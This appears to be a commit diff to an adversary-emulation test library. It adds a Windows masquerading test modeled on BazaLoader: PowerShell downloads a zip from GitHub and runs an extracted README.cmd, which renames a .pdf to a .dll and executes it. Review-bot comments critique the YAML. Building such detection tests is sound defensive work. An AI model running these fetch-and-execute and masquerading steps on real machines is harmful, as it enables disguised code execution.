* T1036

* Update T1036.yaml

* updated description

* correct outfile param

* Add -force to avoid error msg

* update zip url

Co-authored-by: Riley <lriley@NTI.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
lucasRiley
2022-02-07 09:04:43 -06:00
committed by GitHub
parent effcf8b023
commit e029a0734d
2 changed files with 26 additions and 2 deletions
@@ -2,7 +2,7 @@ attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
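Review bot: the only line this hunk changes is `auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd`, and the removed and added versions read identically, so the edit is whitespace-only (trailing whitespace or indentation). Worth confirming it was intentional and that the test block still parses with the two-space list indentation used by the surrounding `atomic_tests` entries.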
@@ -11,4 +11,28 @@ atomic_tests:
copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
start %ALLUSERSPROFILE%\cmd.exe
cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
name: command_prompt
name: command_prompt
- name: Malware Masquerading and Execution from Zip File
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: Url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
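Review bot: the description for "Malware Masquerading and Execution from Zip File" does not say what the renamed DLL does once it runs, yet `cleanup_command` kills `Calculator.exe`; document in the description that the payload launches Calculator (and how the DLL is invoked after the .pdf to .dll rename) so a tester knows which observable to expect and which process to look for in detection telemetry. Two smaller points: `cleanup_command` removes the extracted `T1036` folder but leaves `T1036.zip` in Downloads, so the `prereq_command` stays satisfied on re-runs even if the `url` default changes, which is fine if intentional but should be stated; and the `cd $env:userprofile\Downloads\T1036` line is redundant with the absolute path passed to `cmd /c` unless `README.cmd` depends on the working directory for the rename, in which case a comment saying so would help.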
Binary file not shown.